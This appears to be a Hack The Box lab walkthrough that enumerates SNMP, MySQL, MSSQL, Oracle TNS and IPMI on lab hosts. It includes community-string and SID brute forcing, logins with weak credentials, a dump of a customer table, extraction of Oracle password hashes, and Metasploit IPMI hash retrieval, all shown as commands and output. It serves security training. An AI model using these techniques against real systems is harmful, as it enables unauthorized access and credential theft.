 iso.3.6.1.2.1.1.5.0 = STRING: "NIX02"
 iso.3.6.1.2.1.1.6.0 = STRING: "InFreight SNMP v0.91"
 iso.3.6.1.2.1.1.7.0 = INTEGER: 72
 iso.3.6.1.2.1.1.8.0 = Timeticks: (5) 0:00:00.05
 ...
 iso.3.6.1.2.1.25.1.7.1.2.1.2.4.70.76.65.71 = STRING: "/usr/share/flag.sh"
 iso.3.6.1.2.1.25.1.7.1.2.1.3.4.70.76.65.71 = ""
 iso.3.6.1.2.1.25.1.7.1.2.1.4.4.70.76.65.71 = ""
 iso.3.6.1.2.1.25.1.7.1.2.1.5.4.70.76.65.71 = INTEGER: 5
 iso.3.6.1.2.1.25.1.7.1.2.1.6.4.70.76.65.71 = INTEGER: 1
 iso.3.6.1.2.1.25.1.7.1.2.1.7.4.70.76.65.71 = INTEGER: 1
 iso.3.6.1.2.1.25.1.7.1.2.1.20.4.70.76.65.71 = INTEGER: 4
 iso.3.6.1.2.1.25.1.7.1.2.1.21.4.70.76.65.71 = INTEGER: 1
 iso.3.6.1.2.1.25.1.7.1.3.1.1.4.70.76.65.71 = STRING: "HTB{5nMp_fl4g_uidhfljnsldiuhbfsdij44738b2u763g}"
 iso.3.6.1.2.1.25.1.7.1.3.1.2.4.70.76.65.71 = STRING: "HTB{5nMp_fl4g_uidhfljnsldiuhbfsdij44738b2u763g}"
 iso.3.6.1.2.1.25.1.7.1.3.1.3.4.70.76.65.71 = INTEGER: 1
 iso.3.6.1.2.1.25.1.7.1.3.1.4.4.70.76.65.71 = INTEGER: 0
 iso.3.6.1.2.1.25.1.7.1.4.1.2.4.70.76.65.71.1 = STRING: "HTB{5nMp_fl4g_uidhfljnsldiuhbfsdij44738b2u763g}"
 
 * ALT: braa <community string>@<IP>:.1.3.6.*   # Syntax
        braa [email protected]:.1.3.6.*

Enumerate the custom script that is running on the system and submit its output as the answer.

root@oco:~$ sudo nmap -sU -T4 10.129.7.216 -p 161,162
 PORT    STATE         SERVICE
 161/udp open          snmp
 162/udp open|filtered snmptrap
 
root@oco:~$ sudo nmap -sU -sV -T4 10.129.7.216 -p 161,162
 PORT    STATE         SERVICE  VERSION
 161/udp open          snmp     SNMPv1 server; net-snmp SNMPv3 server (public)
 162/udp open|filtered snmptrap
 Service Info: Host: NIX02

//community string is unknown; start with onesixtyone
root@oco:~$ find / -name snmp.txt  2>/dev/null
 /usr/share/seclists/Discovery/SNMP/snmp.txt

root@oco:~$ cp /usr/share/seclists/Discovery/SNMP/snmp.txt .
root@oco:~$ onesixtyone -c snmp.txt 10.129.7.216
 Scanning 1 hosts, 3219 communities
 10.129.7.216 [public] Linux NIX02 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64
 10.129.7.216 [public] Linux NIX02 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64

root@oco:~$ snmpwalk -v2c -c public 10.129.7.216
 iso.3.6.1.2.1.1.1.0 = STRING: "Linux NIX02 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64"
 iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
 iso.3.6.1.2.1.1.3.0 = Timeticks: (77730) 0:12:57.30
 iso.3.6.1.2.1.1.4.0 = STRING: "devadmin <[email protected]>"
 iso.3.6.1.2.1.1.5.0 = STRING: "NIX02"
 iso.3.6.1.2.1.1.6.0 = STRING: "InFreight SNMP v0.91"
 iso.3.6.1.2.1.1.7.0 = INTEGER: 72
 iso.3.6.1.2.1.1.8.0 = Timeticks: (5) 0:00:00.05
 ...
 iso.3.6.1.2.1.25.1.7.1.2.1.2.4.70.76.65.71 = STRING: "/usr/share/flag.sh"
 iso.3.6.1.2.1.25.1.7.1.2.1.3.4.70.76.65.71 = ""
 iso.3.6.1.2.1.25.1.7.1.2.1.4.4.70.76.65.71 = ""
 iso.3.6.1.2.1.25.1.7.1.2.1.5.4.70.76.65.71 = INTEGER: 5
 iso.3.6.1.2.1.25.1.7.1.2.1.6.4.70.76.65.71 = INTEGER: 1
 iso.3.6.1.2.1.25.1.7.1.2.1.7.4.70.76.65.71 = INTEGER: 1
 iso.3.6.1.2.1.25.1.7.1.2.1.20.4.70.76.65.71 = INTEGER: 4
 iso.3.6.1.2.1.25.1.7.1.2.1.21.4.70.76.65.71 = INTEGER: 1
 iso.3.6.1.2.1.25.1.7.1.3.1.1.4.70.76.65.71 = STRING: "HTB{5nMp_fl4g_uidhfljnsldiuhbfsdij44738b2u763g}"
 iso.3.6.1.2.1.25.1.7.1.3.1.2.4.70.76.65.71 = STRING: "HTB{5nMp_fl4g_uidhfljnsldiuhbfsdij44738b2u763g}"
 iso.3.6.1.2.1.25.1.7.1.3.1.3.4.70.76.65.71 = INTEGER: 1
 iso.3.6.1.2.1.25.1.7.1.3.1.4.4.70.76.65.71 = INTEGER: 0
 iso.3.6.1.2.1.25.1.7.1.4.1.2.4.70.76.65.71.1 = STRING: "HTB{5nMp_fl4g_uidhfljnsldiuhbfsdij44738b2u763g}"
 
 * ALT: braa <community string>@<IP>:.1.3.6.*   # Syntax
        braa [email protected]:.1.3.6.*

MYSQL

Enumerate the MySQL server and determine the version in use. (Format: MySQL X.X.XX)

root@htb:~$ sudo nmap -sV -sC --script=mysql* -T4 10.129.42.195 -p 3306
 PORT     STATE SERVICE VERSION
 3306/tcp open  mysql   MySQL 8.0.27-0ubuntu0.20.04.1
 | mysql-info: 
 |   Protocol: 10
 |   Version: 8.0.27-0ubuntu0.20.04.1
 |   Thread ID: 19
 |   Capabilities flags: 65535
 |   Some Capabilities: Support41Auth, SupportsCompression, Speaks41ProtocolOld, SupportsTransactions, FoundRows, SupportsLoadDataLocal, IgnoreSigpipes, SwitchToSSLAfterHandshake, DontAllowDatabaseTableColumn, InteractiveClient, ConnectWithDatabase, LongColumnFlag, ODBCClient, LongPassword, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
 |   Status: Autocommit
 |   Salt: \x10&T\x1E=gE;Q*fS[D
 | <7\x0C,@
 |_  Auth Plugin Name: caching_sha2_password
 | mysql-brute: 
 |   Accounts: No valid accounts found
 |   Statistics: Performed 964 guesses in 25 seconds, average tps: 38.6
 |_  ERROR: The service seems to have failed or is heavily firewalled...
 | mysql-enum: 
 |   Accounts: No valid accounts found
 |_  Statistics: Performed 5 guesses in 6 seconds, average tps: 0.8

During our penetration test, we found weak credentials "robin:robin". We should try these against the MySQL server. What is the email address of the customer "Otto Lang"?

root@htb:~$ sudo nmap -sV -sC --script=mysql* -T4 10.129.42.195 -p 3306
 PORT     STATE SERVICE VERSION
 3306/tcp open  mysql   MySQL 8.0.27-0ubuntu0.20.04.1
 | mysql-info: 
 |   Protocol: 10
 |   Version: 8.0.27-0ubuntu0.20.04.1
 |   Thread ID: 19
 |   Capabilities flags: 65535
 |   Some Capabilities: Support41Auth, SupportsCompression, Speaks41ProtocolOld, SupportsTransactions, FoundRows, SupportsLoadDataLocal, IgnoreSigpipes, SwitchToSSLAfterHandshake, DontAllowDatabaseTableColumn, InteractiveClient, ConnectWithDatabase, LongColumnFlag, ODBCClient, LongPassword, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
 |   Status: Autocommit
 |   Salt: \x10&T\x1E=gE;Q*fS[D
 | <7\x0C,@
 |_  Auth Plugin Name: caching_sha2_password
 | mysql-brute: 
 |   Accounts: No valid accounts found
 |   Statistics: Performed 964 guesses in 25 seconds, average tps: 38.6
 |_  ERROR: The service seems to have failed or is heavily firewalled...
 | mysql-enum: 
 |   Accounts: No valid accounts found
 |_  Statistics: Performed 5 guesses in 6 seconds, average tps: 0.8

root@htb:~$ mysql -u robin -probin -h 10.129.42.195
 Welcome to the MariaDB monitor.  Commands end with ; or \g.
 Your MySQL connection id is 35
 Server version: 8.0.27-0ubuntu0.20.04.1 (Ubuntu)

 Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

 Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;
 +--------------------+
 | Database           |
 +--------------------+
 | customers          |
 | information_schema |
 | mysql              |
 | performance_schema |
 | sys                |
 +--------------------+
 5 rows in set (0.059 sec)
 
MySQL [(none)]> use customers;
 Reading table information for completion of table and column names
 You can turn off this feature to get a quicker startup with -A

 Database changed
 
MySQL [customers]> show tables;
 +---------------------+
 | Tables_in_customers |
 +---------------------+
 | myTable             |
 +---------------------+

MySQL [customers]> show COLUMNS FROM myTable;
 +-----------+--------------------+------+-----+---------+----------------+
 | Field     | Type               | Null | Key | Default | Extra          |
 +-----------+--------------------+------+-----+---------+----------------+
 | id        | mediumint unsigned | NO   | PRI | NULL    | auto_increment |
 | name      | varchar(255)       | YES  |     | NULL    |                |
 | email     | varchar(255)       | YES  |     | NULL    |                |
 | country   | varchar(100)       | YES  |     | NULL    |                |
 | postalZip | varchar(20)        | YES  |     | NULL    |                |
 | city      | varchar(255)       | YES  |     | NULL    |                |
 | address   | varchar(255)       | YES  |     | NULL    |                |
 | pan       | varchar(255)       | YES  |     | NULL    |                |
 | cvv       | varchar(255)       | YES  |     | NULL    |                |
 +-----------+--------------------+------+-----+---------+----------------+
 9 rows in set (0.015 sec)

MySQL [customers]> SELECT name, email FROM myTable where name;
 +---------------------+------------------------------------------+
 | name                | email                                    |
 +---------------------+------------------------------------------+
 | Emery Reyes         | [email protected]                       |
 | Kristen Trujillo    | [email protected]                     |
 | Fletcher Jimenez    | [email protected]                     |
 | Boris Sharp         | [email protected]                     |
 | Ruth Carson         | [email protected]            |
 | Caryn Porter        | [email protected]                            |
 | G.htbe Stein        | [email protected]                          |
 | Emery Watson        | [email protected]                           |
 | Silas Holder        | [email protected]                        |
 | Patrick Walls       | [email protected]                        |
 | Barclay Knight      | [email protected]                         |
 | Benjamin Church     | [email protected]                       |
 | Kaitlin Lane        | [email protected]          |
 | Xena Robles         | [email protected]             |
 | France.htb Bowen    | [email protected]                     |
 | Dacey Moore         | [email protected]                     |
 | Amity Norton        | [email protected]                       |
 | Lee Kline           | [email protected]               |
 | Nehru Best          | [email protected]                        |
 | Isaiah Shields      | [email protected] |
 | Wing Hunt           | [email protected]            |
 | Elijah Be.htbt      | [email protected]            |
 | Whoopi Arnold       | [email protected]               |
 | Sandra Malone       | [email protected]                      |
 | Petra Castaneda     | [email protected]                |
 | Marvin Welch        | [email protected]           |
 | Yardley Sargent     | [email protected]                       |
 | Richard Gomez       | [email protected]                  |
 | Jamal Hartman       | [email protected]              |
 | Ira Jimenez         | [email protected]                     |
 | Iris Patterson      | [email protected]               |
 | Dana Mayer          | [email protected]                  |
 | Octavia Cantu       | [email protected]                        |
 | Gage Howard         | [email protected]       |
 | Christine Davenport | [email protected]             |
 | Olga Shepherd       | [email protected]                      |
 | Stone Langley       | [email protected]                  |
 | Dora Decker         | [email protected]            |
 | Galvin Cameron      | [email protected]                         |
 | Rylee Zamora        | [email protected]                  |
 | Yvette Love         | [email protected]                |
 | Imani Kinney        | [email protected]               |
 | Louis Bird          | [email protected]                 |
 | Philip Bentley      | [email protected]                    |
 | Kevin Simmons       | [email protected]                         |
 | Colorado Stevenson  | [email protected]  |
 | Raya Patton         | [email protected]              |
 | Mufutau Johnston    | [email protected]                         |
 | Leonard Jacobson    | [email protected]            |
 | Nora Best           | [email protected]           |
 | Carter Long         | [email protected]                     |
 | Christopher Montoya | [email protected]      |
 | Marah Du.htbn       | [email protected]                 |
 | Shay Marquez        | [email protected]        |
 | Brandon Mayo        | [email protected]                  |
 | Lucius Herman       | [email protected]                  |
 | Justine Atkinson    | [email protected]               |
 | Erich Hicks         | [email protected]                 |
 | Gay Morse           | [email protected]                       |
 | Jane Daugherty      | [email protected]                |
 | Branden Grimes      | [email protected]           |
 | Hannah Gallagher    | [email protected]               |
 | Victor Livingston   | [email protected]                   |
 | Cain Nguyen         | [email protected]                  |
 | Wylie Edwards       | [email protected]                 |
 | Lucius Dejesus      | [email protected]                   |
 | Perry Irwin         | [email protected]              |
 | Rooney Carpenter    | [email protected]                           |
 | Willa M.htbrty      | [email protected]              |
 | Sydney Howell       | [email protected]                            |
 | Evangeline Clay     | [email protected]                    |
 | Drake Ashley        | [email protected]                          |
 | Yolanda English     | [email protected]                        |
 | India Good          | [email protected]            |
 | Brendan Humphrey    | [email protected]          |
 | Kevyn Yates         | [email protected]                    |
 | Brenden Ferrell     | [email protected]                          |
 | Medge Tanner        | [email protected]                        |
 | Petra Maxwell       | [email protected]               |
 | Nayda White         | [email protected]               |
 | Leroy Moore         | [email protected]                         |
 | Fleur M.htbll       | [email protected]                           |
 | Hanna Finch         | [email protected]               |
 | Myles Koch          | [email protected]                    |
 | Hashim Waters       | [email protected]            |
 | Quinn Salinas       | [email protected]             |
 | Karly Wright        | [email protected]                   |
 | Otto Lang           | [email protected]                      |
 | Hannah Mullen       | [email protected]           |
 | Keefe Farmer        | [email protected]         |
 | Rylee Walton        | [email protected]          |
 | Quemby Owens        | [email protected]                     |
 | Barrett Becker      | [email protected]                         |
 | Maia Becker         | [email protected]                        |
 | Lisandra Mcknight   | [email protected]                             |
 | Sade Baker          | [email protected]         |
 | August Hubbard      | [email protected]              |
 | Kalia England       | [email protected]   |
 | Tobias Whitney      | [email protected]                |
 +---------------------+------------------------------------------+
 99 rows in set (0.013 sec)

MySQL [customers]> SELECT name, email FROM myTable WHERE name='otto lang';
 +-----------+---------------------+
 | name      | email               |
 +-----------+---------------------+
 | Otto Lang | [email protected] |
 +-----------+---------------------+
 1 row in set (0.010 sec)

MSSQL

Enumerate the target using the concepts taught in this section. List the hostname of MSSQL server.

root@htb:~$ sudo nmap -sV -sC -T4 10.129.230.249 -p 1433
 PORT     STATE SERVICE  VERSION
 1433/tcp open  ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
 | ms-sql-info: 
 |   10.129.230.249\MSSQLSERVER: 
 |     Instance name: MSSQLSERVER
 |     Version: 
 |       name: Microsoft SQL Server 2019 RTM
 |       number: 15.00.2000.00
 |       Product: Microsoft SQL Server 2019
 |       Service pack level: RTM
 |       Post-SP patches applied: false
 |     TCP port: 1433
 |     Named pipe: \\10.129.230.249\pipe\sql\query
 |_    Clustered: false
 | ms-sql-ntlm-info: 
 |   10.129.230.249\MSSQLSERVER: 
 |     Target_Name: ILF-SQL-01
 |     NetBIOS_Domain_Name: ILF-SQL-01
 |     NetBIOS_Computer_Name: ILF-SQL-01
 |     DNS_Domain_Name: ILF-SQL-01
 |     DNS_Computer_Name: ILF-SQL-01
 |_    Product_Version: 10.0.17763
 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
 | Not valid before: 2025-11-10T01:35:56
 |_Not valid after:  2055-11-10T01:35:56
 |_ssl-date: 2025-11-10T01:53:30+00:00; -4s from scanner time.

Connect to the MSSQL instance running on the target using the account (backdoor:Password1), then list the non-default database present on the server.

root@htb:~$ sudo nmap -sV -sC -T4 10.129.230.249 -p 1433
 PORT     STATE SERVICE  VERSION
 1433/tcp open  ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
 | ms-sql-info: 
 |   10.129.230.249\MSSQLSERVER: 
 |     Instance name: MSSQLSERVER
 |     Version: 
 |       name: Microsoft SQL Server 2019 RTM
 |       number: 15.00.2000.00
 |       Product: Microsoft SQL Server 2019
 |       Service pack level: RTM
 |       Post-SP patches applied: false
 |     TCP port: 1433
 |     Named pipe: \\10.129.230.249\pipe\sql\query
 |_    Clustered: false
 | ms-sql-ntlm-info: 
 |   10.129.230.249\MSSQLSERVER: 
 |     Target_Name: ILF-SQL-01
 |     NetBIOS_Domain_Name: ILF-SQL-01
 |     NetBIOS_Computer_Name: ILF-SQL-01
 |     DNS_Domain_Name: ILF-SQL-01
 |     DNS_Computer_Name: ILF-SQL-01
 |_    Product_Version: 10.0.17763
 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
 | Not valid before: 2025-11-10T01:35:56
 |_Not valid after:  2055-11-10T01:35:56
 |_ssl-date: 2025-11-10T01:53:30+00:00; -4s from scanner time.

root@htb:~$ locate mssqlclient
 /opt/pipx/venvs/netexec/bin/__pycache__/mssqlclient.cpython-311.pyc
 /opt/pipx/venvs/netexec/bin/mssqlclient.py
 /root/.local/bin/mssqlclient.py
 /root/.local/share/pipx/venvs/impacket/bin/__pycache__/mssqlclient.cpython-311.pyc
 /root/.local/share/pipx/venvs/impacket/bin/mssqlclient.py
 /usr/bin/impacket-mssqlclient
 /usr/local/bin/__pycache__/mssqlclient.cpython-311.pyc
 /usr/local/bin/mssqlclient.py
 /usr/share/doc/python3-impacket/examples/mssqlclient.py

root@htb:~$ mssqlclient.py [email protected] -windows-auth
 Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies 
 Password:
 [*] Encryption required, switching to TLS
 [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
 [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
 [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
 [*] INFO(ILF-SQL-01): Line 1: Changed database context to 'master'.
 [*] INFO(ILF-SQL-01): Line 1: Changed language setting to us_english.
 [*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
 [!] Press help for extra shell commands
 
SQL (ILF-SQL-01\backdoor  dbo@master)> select name from sys.databases
 name        
 ---------   
 master       

 tempdb      

 model       

 msdb        

 Employees   

SQL (ILF-SQL-01\backdoor  dbo@master)>

ORACLE TNS

Enumerate the target Oracle database and submit the password hash of the user DBSNMP as the answer.

#install required packages
root@htb:~$ wget https://download.oracle.com/otn_software/linux/instantclient/214000/instantclient-basic-linux.x64-21.4.0.0.0dbru.zip
root@htb:~$ wget https://download.oracle.com/otn_software/linux/instantclient/214000/instantclient-sqlplus-linux.x64-21.4.0.0.0dbru.zip
root@htb:~$ sudo mkdir -p /opt/oracle
root@htb:~$ sudo unzip -d /opt/oracle instantclient-basic-linux.x64-21.4.0.0.0dbru.zip
root@htb:~$ sudo unzip -d /opt/oracle instantclient-sqlplus-linux.x64-21.4.0.0.0dbru.zip
root@htb:~$ export LD_LIBRARY_PATH=/opt/oracle/instantclient_21_4:$LD_LIBRARY_PATH
root@htb:~$ export PATH=$LD_LIBRARY_PATH:$PATH
root@htb:~$ source ~/.bashrc
root@htb:~$ cd ~
root@htb:~$ git clone https://github.com/quentinhardy/odat.git
root@htb:~$ cd odat/
root@htb:~$ pip install python-libnmap
root@htb:~$ git submodule init
root@htb:~$ git submodule update
root@htb:~$ pip3 install cx_Oracle
root@htb:~$ sudo apt-get install python3-scapy -y
root@htb:~$ sudo pip3 install colorlog termcolor passlib python-libnmap
root@htb:~$ sudo apt-get install build-essential libgmp-dev -y
root@htb:~$ pip3 install pycryptodome

root@htb:~$ sudo nmap -sV 10.129.205.19 -p 1521 --open
 PORT     STATE SERVICE    VERSION
 1521/tcp open  oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)

#conduct sid bruteforcing
root@htb:~$ sudo nmap -sV 10.129.205.19 -p 1521 --open --script oracle-sid-brute
 PORT     STATE SERVICE    VERSION
 1521/tcp open  oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
 | oracle-sid-brute: 
 |_  XE

#obtain credentials
root@htb:~$ ./odat.py all -s 10.129.205.19
 [+] Checking if target 10.129.204.235:1521 is well configured for a connection...
 [+] According to a test, the TNS listener 10.129.204.235:1521 is well configured. Continue...

 ...SNIP...

 [!] Notice: 'mdsys' account is locked, so skipping this username for password           #####################| ETA:  00:01:16 
 [!] Notice: 'oracle_ocm' account is locked, so skipping this username for password       #####################| ETA:  00:01:05 
 [!] Notice: 'outln' account is locked, so skipping this username for password           #####################| ETA:  00:00:59
 [+] Valid credentials found: scott/tiger. Continue...

 ...SNIP...

 * The "all" option is used to try all modules
 * Valid credentials for the user scott and the password tiger was found

#login using obtained credentials
root@htb:~$ sqlplus scott/[email protected]/XE
 SQL*Plus: Release 21.0.0.0.0 - Production on Sun Nov 16 19:33:31 2025
 Version 21.4.0.0.0

 Copyright (c) 1982, 2021, Oracle.  All rights reserved.

 ERROR:
 ORA-28002: the password will expire within 7 days

 Connected to:
 Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production

SQL> select table_name from all_tables;
 TABLE_NAME
 ------------------------------
 DUAL
 SYSTEM_PRIVILEGE_MAP
 TABLE_PRIVILEGE_MAP
 STMT_AUDIT_OPTION_MAP
 AUDIT_ACTIONS
 WRR$_REPLAY_CALL_FILTER
 HS_BULKLOAD_VIEW_OBJ
 HS$_PARALLEL_METADATA
 HS_PARTITION_COL_NAME
 HS_PARTITION_COL_TYPE
 HELP

 TABLE_NAME
 ------------------------------
 DR$OBJECT_ATTRIBUTE
 DR$POLICY_TAB
 DR$THS
 DR$THS_PHRASE
 DR$NUMBER_SEQUENCE
 SRSNAMESPACE_TABLE
 OGIS_SPATIAL_REFERENCE_SYSTEMS
 OGIS_GEOMETRY_COLUMNS
 SDO_UNITS_OF_MEASURE
 SDO_PRIME_MERIDIANS
 SDO_ELLIPSOIDS

 TABLE_NAME
 ------------------------------
 SDO_DATUMS
 SDO_COORD_SYS
 SDO_COORD_AXIS_NAMES
 SDO_COORD_AXES
 SDO_COORD_REF_SYS
 SDO_COORD_OP_METHODS
 SDO_COORD_OPS
 SDO_PREFERRED_OPS_SYSTEM
 SDO_PREFERRED_OPS_USER
 SDO_COORD_OP_PATHS
 SDO_COORD_OP_PARAMS

 TABLE_NAME
 ------------------------------
 SDO_COORD_OP_PARAM_USE
 SDO_COORD_OP_PARAM_VALS
 SDO_CS_SRS
 NTV2_XML_DATA
 SDO_CRS_GEOGRAPHIC_PLUS_HEIGHT
 SDO_PROJECTIONS_OLD_SNAPSHOT
 SDO_ELLIPSOIDS_OLD_SNAPSHOT
 SDO_DATUMS_OLD_SNAPSHOT
 SDO_XML_SCHEMAS
 WWV_FLOW_DUAL100
 DEPT

 TABLE_NAME
 ------------------------------
 EMP
 BONUS
 SALGRADE
 WWV_FLOW_TEMP_TABLE
 WWV_FLOW_LOV_TEMP
 SDO_TOPO_DATA$
 SDO_TOPO_RELATION_DATA
 SDO_TOPO_TRANSACT_DATA
 SDO_CS_CONTEXT_INFORMATION
 SDO_TXN_IDX_EXP_UPD_RGN
 SDO_TXN_IDX_DELETES

 TABLE_NAME
 ------------------------------
 SDO_TXN_IDX_INSERTS
 SDO_ST_TOLERANCE
 XDB$XIDX_IMP_T
 KU$_DATAPUMP_MASTER_10_1
 KU$_DATAPUMP_MASTER_11_1
 KU$_DATAPUMP_MASTER_11_1_0_7
 KU$_DATAPUMP_MASTER_11_2
 IMPDP_STATS
 ODCI_PMO_ROWIDS$
 ODCI_WARNINGS$
 ODCI_SECOBJ$

 TABLE_NAME
 ------------------------------
 KU$_LIST_FILTER_TEMP_2
 KU$_LIST_FILTER_TEMP
 KU$NOEXP_TAB
 OL$NODES
 OL$HINTS
 OL$
 PLAN_TABLE$
 WRI$_ADV_ASA_RECO_DATA
 PSTUBTBL

 75 rows selected.

SQL> select * from user_role_privs;
 USERNAME		       GRANTED_ROLE		      ADM DEF OS_
 ------------------------------ ------------------------------ --- --- ---
 SCOTT			       CONNECT			      NO  YES NO
 SCOTT			       RESOURCE 		      NO  YES NO

#try to login as sysdba
root@htb:~$ sqlplus scott/[email protected]/XE as sysdba
 SQL*Plus: Release 21.0.0.0.0 - Production on Sun Nov 16 19:41:01 2025
 Version 21.4.0.0.0

 Copyright (c) 1982, 2021, Oracle.  All rights reserved.

 Connected to:
 Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production

SQL> select * from user_role_privs;
 USERNAME		       GRANTED_ROLE		      ADM DEF OS_
 ------------------------------ ------------------------------ --- --- ---
 SYS			       ADM_PARALLEL_EXECUTE_TASK      YES YES NO
 SYS			       APEX_ADMINISTRATOR_ROLE	      YES YES NO
 SYS			       AQ_ADMINISTRATOR_ROLE	      YES YES NO
 SYS			       AQ_USER_ROLE		      YES YES NO
 SYS			       AUTHENTICATEDUSER	      YES YES NO
 SYS			       CONNECT			      YES YES NO
 SYS			       CTXAPP			      YES YES NO
 SYS			       DATAPUMP_EXP_FULL_DATABASE     YES YES NO
 SYS			       DATAPUMP_IMP_FULL_DATABASE     YES YES NO
 SYS			       DBA			      YES YES NO
 SYS			       DBFS_ROLE		      YES YES NO

 USERNAME		       GRANTED_ROLE		      ADM DEF OS_
 ------------------------------ ------------------------------ --- --- ---
 SYS			       DELETE_CATALOG_ROLE	      YES YES NO
 SYS			       EXECUTE_CATALOG_ROLE	      YES YES NO
 SYS			       EXP_FULL_DATABASE	      YES YES NO
 SYS			       GATHER_SYSTEM_STATISTICS       YES YES NO
 SYS			       HS_ADMIN_EXECUTE_ROLE	      YES YES NO
 SYS			       HS_ADMIN_ROLE		      YES YES NO
 SYS			       HS_ADMIN_SELECT_ROLE	      YES YES NO
 SYS			       IMP_FULL_DATABASE	      YES YES NO
 SYS			       LOGSTDBY_ADMINISTRATOR	      YES YES NO
 SYS			       OEM_ADVISOR		      YES YES NO
 SYS			       OEM_MONITOR		      YES YES NO

 USERNAME		       GRANTED_ROLE		      ADM DEF OS_
 ------------------------------ ------------------------------ --- --- ---
 SYS			       PLUSTRACE		      YES YES NO
 SYS			       RECOVERY_CATALOG_OWNER	      YES YES NO
 SYS			       RESOURCE 		      YES YES NO
 SYS			       SCHEDULER_ADMIN		      YES YES NO
 SYS			       SELECT_CATALOG_ROLE	      YES YES NO
 SYS			       XDBADMIN 		      YES YES NO
 SYS			       XDB_SET_INVOKER		      YES YES NO
 SYS			       XDB_WEBSERVICES		      YES YES NO
 SYS			       XDB_WEBSERVICES_OVER_HTTP      YES YES NO
 SYS			       XDB_WEBSERVICES_WITH_PUBLIC    YES YES NO

 32 rows selected.

SQL>

The sys.user$ table is a core data dictionary table within the SYS schema and is not accessible to regular users. Access to this table is restricted because it contains sensitive information, including hashed passwords. Only users with high-level administrative privileges—such as those granted the DBA role or direct SELECT ANY TABLE privileges—can query it. Oracle enforces these restrictions to protect the security and integrity of the database, preventing unauthorized users from viewing or tampering with critical system data.

SQL> select table_name from all_tables;
 ...
 sys.user$
 ...
 
SQL> select name, password from sys.user$;
 NAME			       PASSWORD
 ------------------------------ ------------------------------
 SYS			       FBA343E7D6C8BC9D
 PUBLIC
 CONNECT
 RESOURCE
 DBA
 SYSTEM			       B5073FE1DE351687
 SELECT_CATALOG_ROLE
 EXECUTE_CATALOG_ROLE
 DELETE_CATALOG_ROLE
 OUTLN			       4A3BA55E08595C81
 EXP_FULL_DATABASE

 NAME			       PASSWORD
 ------------------------------ ------------------------------
 IMP_FULL_DATABASE
 LOGSTDBY_ADMINISTRATOR
 DBFS_ROLE
 DIP			       CE4A36B8E06CA59C
 AQ_ADMINISTRATOR_ROLE
 AQ_USER_ROLE
 DATAPUMP_EXP_FULL_DATABASE
 DATAPUMP_IMP_FULL_DATABASE
 ADM_PARALLEL_EXECUTE_TASK
 GATHER_SYSTEM_STATISTICS
 XDB_WEBSERVICES_OVER_HTTP

 NAME			       PASSWORD
 ------------------------------ ------------------------------
 ORACLE_OCM		       5A2E026A9157958C
 RECOVERY_CATALOG_OWNER
 SCHEDULER_ADMIN
 HS_ADMIN_SELECT_ROLE
 HS_ADMIN_EXECUTE_ROLE
 HS_ADMIN_ROLE
 OEM_ADVISOR
 OEM_MONITOR
 DBSNMP			       E066D214D5421CCC
 APPQOSSYS		       519D632B7EE7F63A
 PLUSTRACE

 NAME			       PASSWORD
 ------------------------------ ------------------------------
 CTXSYS			       D1D21CA56994CAB6
 CTXAPP
 XDB			       E76A6BD999EF9FF1
 ANONYMOUS		       anonymous
 XDBADMIN
 XDB_SET_INVOKER
 AUTHENTICATEDUSER
 XDB_WEBSERVICES
 XDB_WEBSERVICES_WITH_PUBLIC
 XS$NULL 		       DC4FCC8CB69A6733
 _NEXT_USER

 NAME			       PASSWORD
 ------------------------------ ------------------------------
 MDSYS			       72979A94BAD2AF80
 HR			       4C6D73C3E8B0F0DA
 FLOWS_FILES		       30128982EA6D4A3D
 APEX_PUBLIC_USER	       4432BA224E12410A
 APEX_ADMINISTRATOR_ROLE
 APEX_040000		       E7CE9863D7EEB0A4
 SCOTT			       F894844C34402B67

 51 rows selected.

SQL>

IPMI

What username is configured for accessing the host via IPMI?

root@htb:~$ sudo nmap -sU --script ipmi-version 10.129.116.226 -p 623
 PORT    STATE SERVICE
 623/udp open  asf-rmcp
 | ipmi-version: 
 |   Version: 
 |     IPMI-2.0
 |   UserAuth: password, md5, md2, null
 |   PassAuth: auth_msg, auth_user, non_null_user
 |_  Level: 1.5, 2.0

root@htb:~$ msfconsole
[msf](Jobs:0 Agents:0) >> search ipmi
    1   auxiliary/scanner/ipmi/ipmi_dumphashes   2013-06-20   normal  No     IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval
[msf](Jobs:0 Agents:0) >> use 1
[msf](Jobs:0 Agents:0) auxiliary(scanner/ipmi/ipmi_dumphashes) >> show options
 PASS_FILE             /usr/share/metasploit-framework/data/wordlists/ipmi_passwords.txt  yes       File containing common passwords for offline cracking, one per line
 RHOSTS                                                                       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
 RPORT                 623                                                    yes       The target port
 SESSION_MAX_ATTEMPTS  5                                                      yes       Maximum number of session retries, required on certain BMCs (HP iLO 4, etc)
 SESSION_RETRY_DELAY   5                                                      yes       Delay between session retries in seconds
 THREADS               1                                                      yes       The number of concurrent threads (max one per host)
